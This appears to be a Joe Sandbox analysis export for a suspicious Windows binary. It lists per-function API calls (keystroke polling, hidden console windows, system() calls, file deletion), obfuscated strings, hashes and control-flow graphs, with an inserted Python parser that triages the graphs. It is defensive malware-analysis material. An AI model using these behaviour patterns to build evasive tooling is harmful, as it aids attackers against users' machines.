                                                                                                                  • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF77C91D59A
                                                                                                                  • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF77C91D6E9
                                                                                                                    • Part of subcall function 00007FF77C91E450: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,00007FF77C912FCB), ref: 00007FF77C91E500
                                                                                                                  • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF77C91D837
                                                                                                                  • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF77C91DB06
                                                                                                                  • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF77C91DC55
                                                                                                                  • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF77C91DDA5
                                                                                                                  • GetAsyncKeyState.USER32 ref: 00007FF77C91DE7B
                                                                                                                  • GetAsyncKeyState.USER32 ref: 00007FF77C91DE95
                                                                                                                  • GetAsyncKeyState.USER32 ref: 00007FF77C91DEA9
                                                                                                                  • GetAsyncKeyState.USER32 ref: 00007FF77C91DEBD
                                                                                                                  • Beep.KERNEL32 ref: 00007FF77C91DECF
                                                                                                                  • system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF77C91E054
                                                                                                                  • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF77C91E0F5
                                                                                                                  • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF77C91CAA5
                                                                                                                    • Part of subcall function 00007FF77C91EAD0: _Query_perf_frequency.MSVCP140 ref: 00007FF77C91EB40
                                                                                                                    • Part of subcall function 00007FF77C91EAD0: _Query_perf_counter.MSVCP140 ref: 00007FF77C91EB49
                                                                                                                    • Part of subcall function 00007FF77C91EAD0: Sleep.KERNEL32 ref: 00007FF77C91EBE9
                                                                                                                    • Part of subcall function 00007FF77C91EAD0: Sleep.KERNEL32 ref: 00007FF77C91EC17
                                                                                                                  • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF77C91CB65
                                                                                                                  • CreateThread.KERNEL32 ref: 00007FF77C91CBAB
                                                                                                                    • Part of subcall function 00007FF77C91E8E0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF77C91E92F
                                                                                                                    • Part of subcall function 00007FF77C91E8E0: ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF77C91E94F
                                                                                                                    • Part of subcall function 00007FF77C91E8E0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF77C91E95F
                                                                                                                    • Part of subcall function 00007FF77C91E8E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF77C91E9BE
                                                                                                                    • Part of subcall function 00007FF77C91E8E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF77C91E9EA
                                                                                                                    • Part of subcall function 00007FF77C91E8E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF77C91EA1A
                                                                                                                  • system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF77C91E294
                                                                                                                  • system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF77C91E420
                                                                                                                  • ?_Throw_Cpp_error@std@@YAXH@Z.MSVCP140 ref: 00007FF77C91E430
                                                                                                                  • ?_Throw_Cpp_error@std@@YAXH@Z.MSVCP140 ref: 00007FF77C91E443
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.3719113689.00007FF77C911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF77C910000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.3719048759.00007FF77C910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.3719224107.00007FF77C923000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.3719312989.00007FF77C927000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.3719399470.00007FF77C928000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff77c910000_18sFhgSyVK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: V01@$D@std@@@std@@U?$char_traits@$??6?$basic_ostream@V01@@$Windowsystem$Console$AsyncSleepState$?sputc@?$basic_streambuf@CreateThread$?good@ios_base@std@@AttributeCpp_error@std@@HandleLongShowTextThrow_$?flush@?$basic_ostream@AttributesBeepLayeredQuery_perf_counterQuery_perf_frequencyThrd_detachV12@_beginthreadex_invalid_parameter_noinfo_noreturnremove
                                                                                                                  • String ID: [ $ [ $ {3/=Y$ -> $$$...$/$2$CLEAN$CORD $RIALS$g
                                                                                                                  • API String ID: 2431152118-3230283055
                                                                                                                  • Opcode ID: 44f985fbd5678d5907bc988f1348afe19341bae3da2febf82a29eb50d1b292fd
                                                                                                                  • Instruction ID: a820ffe412fcf4583119756647ddf9e00937cfb5443ef566cd35a9fe2cbe92b2
                                                                                                                  • Opcode Fuzzy Hash: 44f985fbd5678d5907bc988f1348afe19341bae3da2febf82a29eb50d1b292fd
                                                                                                                  • Instruction Fuzzy Hash: 9813DB27D38B818AE751AB34D4412E9F364FF9A344F809732E68D26A55EF7CE245CB10

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.3719113689.00007FF77C911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF77C910000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.3719048759.00007FF77C910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.3719224107.00007FF77C923000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.3719312989.00007FF77C927000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.3719399470.00007FF77C928000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff77c910000_18sFhgSyVK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __p___argc__p___argv__scrt_acquire_startup_lock__scrt_release_startup_lock_cexit_exit_get_initial_narrow_environment_register_thread_local_exe_atexit_callback
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1133592946-0
                                                                                                                  • Opcode ID: 4ef5377b25107f2a1d837aabb317369dc2c5c0e0720e2edbdbad70c8d92f59fc
                                                                                                                  • Instruction ID: ebc971b7c29f11cdb04001c514d8a766e59c0743a590f81f0b49daa128332ce9
                                                                                                                  • Opcode Fuzzy Hash: 4ef5377b25107f2a1d837aabb317369dc2c5c0e0720e2edbdbad70c8d92f59fc
                                                                                                                  • Instruction Fuzzy Hash: BF314F33A3924281EBD4BB2098513B9D651AF4DB84FC65035E6CD076D3DE2CA8048E70

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.3719113689.00007FF77C911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF77C910000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.3719048759.00007FF77C910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.3719224107.00007FF77C923000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.3719312989.00007FF77C927000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.3719399470.00007FF77C928000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff77c910000_18sFhgSyVK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$AsyncConcurrency::cancel_current_taskConsoleStateTitlemalloc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3654954394-0
                                                                                                                  • Opcode ID: ab273bf31dccc9d7ad5ac621e40352442693ef51d9a40282266747e1f2efc9f3
                                                                                                                  • Instruction ID: 4eddfd319a24fb20743b134f2f2f5243417d149b2ad46cca3d8e60c4c0a3b92e
                                                                                                                  • Opcode Fuzzy Hash: ab273bf31dccc9d7ad5ac621e40352442693ef51d9a40282266747e1f2efc9f3
                                                                                                                  • Instruction Fuzzy Hash: 7A61D763A39A458AEB90BB24D04137DA361EB4CBA4F944B31DA6D037D5DE3CE4918B10

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.3719113689.00007FF77C911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF77C910000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.3719048759.00007FF77C910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.3719224107.00007FF77C923000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.3719312989.00007FF77C927000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.3719399470.00007FF77C928000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff77c910000_18sFhgSyVK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Random_device@std@@mallocmemcpy
                                                                                                                  • String ID: 456789$>$?
                                                                                                                  • API String ID: 3242188636-3395382736
                                                                                                                  • Opcode ID: 648c566063535ba3f393b7f13df97951d948215bc3d6760c37ec6b1a71022239
                                                                                                                  • Instruction ID: cbbb6296a54339b3582c1a0e344d914d27bef3c811f79534a301d277252dbce5
                                                                                                                  • Opcode Fuzzy Hash: 648c566063535ba3f393b7f13df97951d948215bc3d6760c37ec6b1a71022239
                                                                                                                  • Instruction Fuzzy Hash: 42510333A38B8186E7549F20E411369B7A5FB9D784F815235EA8D43B96DF7CE1808B00

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.3719113689.00007FF77C911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF77C910000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.3719048759.00007FF77C910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.3719224107.00007FF77C923000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.3719312989.00007FF77C927000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.3719399470.00007FF77C928000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff77c910000_18sFhgSyVK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Query_perf_counterQuery_perf_frequencySleep
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2072706261-0
                                                                                                                  • Opcode ID: 2194a2fa61b6804341ac4275b04e4c07c76acd779c48385e2ccf2eb000075af4
                                                                                                                  • Instruction ID: c60b4957155006419ca790499d910cc7a9b75560ab0ee4ba74bb387d576bf8dd
                                                                                                                  • Opcode Fuzzy Hash: 2194a2fa61b6804341ac4275b04e4c07c76acd779c48385e2ccf2eb000075af4
                                                                                                                  • Instruction Fuzzy Hash: FF314D52B3578947DF48EB1AB41B175E255AB8CBD0F885532CA5F0B7D1ED3CE2414B00

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.3719113689.00007FF77C911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF77C910000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.3719048759.00007FF77C910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.3719224107.00007FF77C923000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.3719312989.00007FF77C927000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.3719399470.00007FF77C928000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff77c910000_18sFhgSyVK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Cnd_do_broadcast_at_thread_exit
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2632783013-0
                                                                                                                  • Opcode ID: 2869d9d3d2f6179e35a8d8d6f441b2b2e53643ae4e4bf331b521045d6cecb952
                                                                                                                  • Instruction ID: 132cb4c54b2097ebe08fffccee8430a36f8b558183203b38e067914ad10868f5
                                                                                                                  • Opcode Fuzzy Hash: 2869d9d3d2f6179e35a8d8d6f441b2b2e53643ae4e4bf331b521045d6cecb952
                                                                                                                  • Instruction Fuzzy Hash: EDC08C92F3020282EBA437B2A80A1BD4350AF8EB01F986030C99609342CE2DC4EE4B20
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.3719113689.00007FF77C911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF77C910000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.3719048759.00007FF77C910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.3719224107.00007FF77C923000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.3719312989.00007FF77C927000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.3719399470.00007FF77C928000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff77c910000_18sFhgSyVK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: system
                                                                                                                  • String ID: ajsgW$cv{`vH$ib{o_$mrdV$mrdV$sfkpfX$uj|N${ncxn`
                                                                                                                  • API String ID: 3377271179-3190602498
                                                                                                                  • Opcode ID: dc3be9d7b5a9b16d38511b99783f75fc626b8055b38d4ffc4853348646bc3324
                                                                                                                  • Instruction ID: 2b54d0925610b892a9354fa5424a686d3334bec70e3b47c7f191a87424cef977
                                                                                                                  • Opcode Fuzzy Hash: dc3be9d7b5a9b16d38511b99783f75fc626b8055b38d4ffc4853348646bc3324
                                                                                                                  • Instruction Fuzzy Hash: 5A93CB2BE3EB864FF703A73680010A8E3649FBB684791D727FD5475992FB26B1C18644
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.3719113689.00007FF77C911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF77C910000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.3719048759.00007FF77C910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.3719224107.00007FF77C923000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.3719312989.00007FF77C927000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.3719399470.00007FF77C928000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff77c910000_18sFhgSyVK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FindWindow$system
                                                                                                                  • String ID: * 44*"Q$430$W$L]O[?$N[Z[M@$WZfFN8$Z_V[M@$s]^UZ2A
                                                                                                                  • API String ID: 2416310371-2624150015
                                                                                                                  • Opcode ID: 5469edbc63856aa17bbd0d8b092fc140624db01011814871da82e804fa4170f5
                                                                                                                  • Instruction ID: 3fb68b49bd48ac8ad4449636a11dc921a754dca25245279d67b5891db269b483
                                                                                                                  • Opcode Fuzzy Hash: 5469edbc63856aa17bbd0d8b092fc140624db01011814871da82e804fa4170f5
                                                                                                                  • Instruction Fuzzy Hash: 5B03386BE3AB824EF703A63580030A4E2645FBB2C4791E727FD5475993FF2A71D28614

                                                                                                                  Control-flow Graph

                                                                                                                   Control-flow graph of 7ff77c9121e0-7ff77c912eeb (44 basic blocks; the rendered graph and its executed/not-executed colouring are not preserved in this text export). Blocks that call an import:
                                                                                                                   • 7ff77c912302-7ff77c912370: system (also calls 7ff77c9201c0 internally)
                                                                                                                   • 7ff77c912380-7ff77c9123aa: basic_ostream<char>::operator<< (manipulator overload; internal calls 7ff77c91e8e0, 7ff77c91ead0)
                                                                                                                   • 7ff77c9123ac-7ff77c912433: Beep (internal call 7ff77c92050c)
                                                                                                                   • 7ff77c91257f-7ff77c91259a: system
                                                                                                                   • 7ff77c912642-7ff77c912699: system
                                                                                                                   • 7ff77c9127df-7ff77c91284f: SetConsoleTitleW (internal call 7ff77c9201c0)
                                                                                                                   • 7ff77c912860-7ff77c91288a: basic_ostream<char>::operator<< (internal calls 7ff77c91e8e0, 7ff77c91ead0)
                                                                                                                   • 7ff77c91288c-7ff77c912930: system, GetConsoleWindow, ShowWindow (internal call 7ff77c92050c)
                                                                                                                   • 7ff77c912b82-7ff77c912baa: system
                                                                                                                   • 7ff77c912df2-7ff77c912e0d: remove
                                                                                                                   • 7ff77c912ead-7ff77c912eeb: system
                                                                                                                   Nine blocks branch back to themselves (7ff77c9122d0, 7ff77c912450, 7ff77c912550, 7ff77c912610, 7ff77c9126b0, 7ff77c9127b0, 7ff77c912b50, 7ff77c912dc0, 7ff77c912e80); each of them flows into one of the import-calling blocks listed above.
                                                                                                                  APIs
                                                                                                                  • system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF77C912306
                                                                                                                  • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF77C912395
                                                                                                                  • Beep.KERNEL32 ref: 00007FF77C9123C0
                                                                                                                  • system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF77C912584
                                                                                                                  • system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF77C912646
                                                                                                                  • SetConsoleTitleW.KERNEL32 ref: 00007FF77C9127E4
                                                                                                                  • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF77C912875
                                                                                                                    • Part of subcall function 00007FF77C91EAD0: _Query_perf_frequency.MSVCP140 ref: 00007FF77C91EB40
                                                                                                                    • Part of subcall function 00007FF77C91EAD0: _Query_perf_counter.MSVCP140 ref: 00007FF77C91EB49
                                                                                                                    • Part of subcall function 00007FF77C91EAD0: Sleep.KERNEL32 ref: 00007FF77C91EBE9
                                                                                                                    • Part of subcall function 00007FF77C91EAD0: Sleep.KERNEL32 ref: 00007FF77C91EC17
                                                                                                                  • system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF77C9128F9
                                                                                                                  • GetConsoleWindow.KERNEL32 ref: 00007FF77C9128FF
                                                                                                                  • ShowWindow.USER32 ref: 00007FF77C91290D
                                                                                                                    • Part of subcall function 00007FF77C91E8E0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF77C91E92F
                                                                                                                    • Part of subcall function 00007FF77C91E8E0: ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF77C91E94F
                                                                                                                    • Part of subcall function 00007FF77C91E8E0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF77C91E95F
                                                                                                                    • Part of subcall function 00007FF77C91E8E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF77C91E9BE
                                                                                                                    • Part of subcall function 00007FF77C91E8E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF77C91E9EA
                                                                                                                    • Part of subcall function 00007FF77C91E8E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF77C91EA1A
                                                                                                                  • system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF77C912B87
                                                                                                                  • remove.API-MS-WIN-CRT-FILESYSTEM-L1-1-0 ref: 00007FF77C912DF7
                                                                                                                  • system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF77C912EB1
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.3719113689.00007FF77C911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF77C910000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.3719048759.00007FF77C910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.3719224107.00007FF77C923000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.3719312989.00007FF77C927000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.3719399470.00007FF77C928000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff77c910000_18sFhgSyVK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: D@std@@@std@@U?$char_traits@system$V01@$?sputc@?$basic_streambuf@$??6?$basic_ostream@?good@ios_base@std@@ConsoleSleepV01@@Window$?flush@?$basic_ostream@BeepQuery_perf_counterQuery_perf_frequencyShowTitleV12@remove
                                                                                                                  • String ID: ass$!%1F$2$4$5$6$7$8$9$:$<$XPK@$p
                                                                                                                  • API String ID: 626215716-2315155706
                                                                                                                  • Opcode ID: 3107752629043e942726af6d28afe5fc1e49fe5255247a95fedf609eb7100483
                                                                                                                  • Instruction ID: 2a69b2eea4fc798b839fc089e063d640fb509dd16a9a656bcfa45f7ac5e04c56
                                                                                                                  • Opcode Fuzzy Hash: 3107752629043e942726af6d28afe5fc1e49fe5255247a95fedf609eb7100483
                                                                                                                  • Instruction Fuzzy Hash: A072E627D39BC28AF303A73594020A5E764AFBB2C4B91D733F99431957EF29B1C28614
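Joe Sandbox stores each function's control-flow graph as a flattened node list (`<id> <start>-<end> [label ...]` opens a basic block, `<src>-><dst>` is an edge, `call <addr>` is an internal call, a bare token is an imported API and `<api> * N` means N calls), which is all that survives when the graph image is not rendered. The parser below is an added example, not code from the report or from Joe Security; it assumes only that grammar, and its two inputs are fragments copied from this function's graph (7ff77c9121e0) and from the closing block of the next one (7ff77c913660). It rebuilds blocks and edges, lists which blocks call which imports and how often, and flags import-calling blocks that are entered from a block looping on itself.

```python
"""Rebuild a Joe Sandbox control_flow_graph node list and list its API-calling blocks.

Added example; not code from the report or from Joe Security. The input
fragments below are copied from this report's graphs for 7ff77c9121e0 and
7ff77c913660 (assumption: the token grammar seen on the page is the whole format).
"""
import re
from collections import defaultdict
from dataclasses import dataclass, field

NODE_ID = re.compile(r"^\d+$")
ADDR = re.compile(r"^[0-9a-f]{8,16}(?:-[0-9a-f]{8,16})?$")
EDGE = re.compile(r"^(\d+)->(\d+)$")

# Opening of the graph for 7ff77c9121e0, copied from the report (fragment).
CFG_FRAGMENT = (
    "control_flow_graph 1008 7ff77c9121e0-7ff77c912258 1009 7ff77c91225e-7ff77c912265 "
    "1008->1009 1010 7ff77c912302-7ff77c912370 system call 7ff77c9201c0 1008->1010 "
    "1011 7ff77c912267-7ff77c9122c2 1009->1011 1012 7ff77c9122c4-7ff77c9122c8 1009->1012 "
    "1016 7ff77c9123ac-7ff77c912433 call 7ff77c92050c Beep 1010->1016 "
    "1017 7ff77c912372-7ff77c91237a 1010->1017 1011->1010 "
    "1014 7ff77c9122d0-7ff77c912300 1012->1014 1014->1010 1014->1014 "
    "1022 7ff77c912439-7ff77c912449 1016->1022 1023 7ff77c91253b-7ff77c912546 1016->1023 "
    "1019 7ff77c912380-7ff77c9123aa call 7ff77c91e8e0 "
    "??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z "
    "call 7ff77c91ead0 1017->1019 1019->1016 "
    "1025 7ff77c912450-7ff77c91252f 1022->1025 1026 7ff77c912550-7ff77c91257d 1023->1026 "
    "1025->1025 1028 7ff77c912535-7ff77c912539 1025->1028 1026->1026 "
    "1029 7ff77c91257f-7ff77c91259a system 1026->1029"
)
# Last two blocks of the graph for 7ff77c913660, copied from the report ("Beep * 4").
CFG_TAIL_FRAGMENT = (
    "control_flow_graph 1185 7ff77c9142a0-7ff77c9142ca 1185->1185 "
    "1187 7ff77c9142cc-7ff77c914342 system GetConsoleWindow ShowWindow Beep * 4 1185->1187"
)


@dataclass
class Block:
    node_id: int
    start: int
    end: int
    apis: list = field(default_factory=list)      # [(import name, call count)]
    subcalls: list = field(default_factory=list)  # internal call targets (int)


def parse_cfg(text):
    """Return ({node_id: Block}, [(src, dst), ...]) from the flattened graph text."""
    tokens = text.split()
    if tokens and tokens[0] == "control_flow_graph":
        tokens = tokens[1:]
    blocks, edges, cur, i = {}, [], None, 0
    while i < len(tokens):
        tok = tokens[i]
        nxt = tokens[i + 1] if i + 1 < len(tokens) else ""
        if (m := EDGE.match(tok)):
            edges.append((int(m.group(1)), int(m.group(2))))
            i += 1
        elif NODE_ID.match(tok) and ADDR.match(nxt):      # "<id> <start>-<end>"
            lo, _, hi = nxt.partition("-")
            cur = Block(int(tok), int(lo, 16), int(hi or lo, 16))
            blocks[cur.node_id] = cur
            i += 2
        elif cur is None:
            raise ValueError(f"label {tok!r} appears before any block")
        elif tok == "call" and ADDR.match(nxt):           # internal "call <addr>"
            cur.subcalls.append(int(nxt, 16))
            i += 2
        elif tok == "*" and NODE_ID.match(nxt) and cur.apis:  # "<api> * N"
            name, n = cur.apis[-1]
            cur.apis[-1] = (name, n * int(nxt))
            i += 2
        else:                                             # bare token = imported API
            cur.apis.append((tok, 1))
            i += 1
    return blocks, edges


def entry_block(blocks, edges):
    """The lowest block no edge points at (the function entry), or None."""
    targets = {dst for _, dst in edges}
    roots = [b for b in blocks.values() if b.node_id not in targets]
    return min(roots, key=lambda b: b.start) if roots else None


def self_loop_blocks(edges):
    """Node ids of blocks that branch back to themselves (tight loops)."""
    return sorted({src for src, dst in edges if src == dst})


def api_blocks(blocks):
    """[(\"start-end\", [(api, count)]), ...] for every block that calls an import, by address."""
    return [(f"{b.start:x}-{b.end:x}", b.apis)
            for b in sorted(blocks.values(), key=lambda b: b.start) if b.apis]


def api_histogram(blocks):
    """Total call count per imported API across the whole function."""
    hist = defaultdict(int)
    for b in blocks.values():
        for name, n in b.apis:
            hist[name] += n
    return dict(hist)


def loop_fed_api_blocks(blocks, edges):
    """Start addresses of import-calling blocks entered directly from a self-looping block."""
    loops = set(self_loop_blocks(edges))
    preds = defaultdict(set)
    for src, dst in edges:
        preds[dst].add(src)
    return sorted(f"{b.start:x}" for b in blocks.values()
                  if b.apis and preds[b.node_id] & loops)


def summarize(text):
    """Compact triage view of one function's graph."""
    blocks, edges = parse_cfg(text)
    entry = entry_block(blocks, edges)
    return {"entry": f"{entry.start:x}" if entry else None,
            "blocks": len(blocks), "edges": len(edges),
            "imports": api_histogram(blocks),
            "api_blocks": api_blocks(blocks),
            "loop_fed": loop_fed_api_blocks(blocks, edges)}


if __name__ == "__main__":
    for frag in (CFG_FRAGMENT, CFG_TAIL_FRAGMENT):
        print(summarize(frag))
```

`loop_fed` is the field to look at first: a block that spins on itself and then falls straight into a `system()` call is the shape a per-call string-decoding loop leaves, which fits the unreadable String IDs attached to these functions; confirm it by reading the loop body in the dump rather than trusting the graph alone, since the export does not say which blocks actually executed.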

                                                                                                                  Control-flow Graph

                                                                                                                   Control-flow graph of 7ff77c913660-7ff77c914342 (49 basic blocks; the rendered graph and its executed/not-executed colouring are not preserved in this text export). Blocks that call an import:
                                                                                                                   • 7ff77c913840-7ff77c913873: system
                                                                                                                   • 7ff77c9139b3-7ff77c9139ec: system
                                                                                                                   • 7ff77c913b30-7ff77c913b61: system
                                                                                                                   • 7ff77c913ca3-7ff77c913cea: system
                                                                                                                   • 7ff77c913e30-7ff77c913e5f: system
                                                                                                                   • 7ff77c913fa0-7ff77c913ff1: system
                                                                                                                   • 7ff77c914140-7ff77c914184: system
                                                                                                                   • 7ff77c9142cc-7ff77c914342: system, GetConsoleWindow, ShowWindow, Beep (4 calls)
                                                                                                                   Each system block is preceded by two blocks that branch back to themselves (for the first: 7ff77c913710-7ff77c9137f3 and 7ff77c913810-7ff77c91383e).
                                                                                                                  APIs
